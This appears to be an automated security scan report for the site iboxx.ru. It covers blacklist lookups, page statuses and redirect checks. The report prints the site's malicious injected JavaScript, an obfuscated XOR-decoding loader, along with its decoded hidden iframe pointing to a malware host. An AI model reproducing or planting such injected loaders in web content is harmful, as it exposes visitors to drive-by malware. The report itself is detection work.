Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iboxx.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iboxx.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iboxx.ru/ | 200 OK Content-Length: 1765 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tcadg='1d49554c4d1f1d434e45581f1d484753404c44015253421c03495555511b0e0e5656565b405140520f424f0e5748510e484f0f4246481e1012030156484555491c10014944484649551c10015255584d441c035748524843484d4855581b49484545444f031f1d0e484753404c441f1d0e434e45581f1d0e49554c4d1f';fscy="qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh);";eval(fscy); Decoded script: qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh); qjqi=0;hgkh='';for(dfeda=0;dfeda<fscy['length'];dfeda+=1)qjqi+=fscy.charCodeAt(dfeda);qjqi%=0x64;for(dfeda=0;dfeda<tcadg['length'];dfeda+=2)hgkh+=String.fromCharCode(parseInt(0+'x'+tcadg.charAt(dfeda)+tcadg.charAt(dfeda+1))^qjqi);document.write(hgkh); <html><body><iframe src="http://wwwzapas.cn/vip/in.cgi?13" width=1 height=1 style="visibility:hidden"></iframe></body></html> Antivirus reports:
| ||
http://iboxx.ru/test404page.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iboxx.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 19:52:47 GMT
Server: nginx/1.0.6
Content-Type: text/html; charset=windows-1251
GET / HTTP/1.1
Host: iboxx.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Oct 2014 19:52:47 GMT
Server: nginx/1.0.6
Content-Type: text/html; charset=windows-1251
Second query (visit from search engine):
GET / HTTP/1.1
Host: iboxx.ru
Referer: http://www.google.com/search?q=iboxx.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iboxx.ru
Referer: http://www.google.com/search?q=iboxx.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.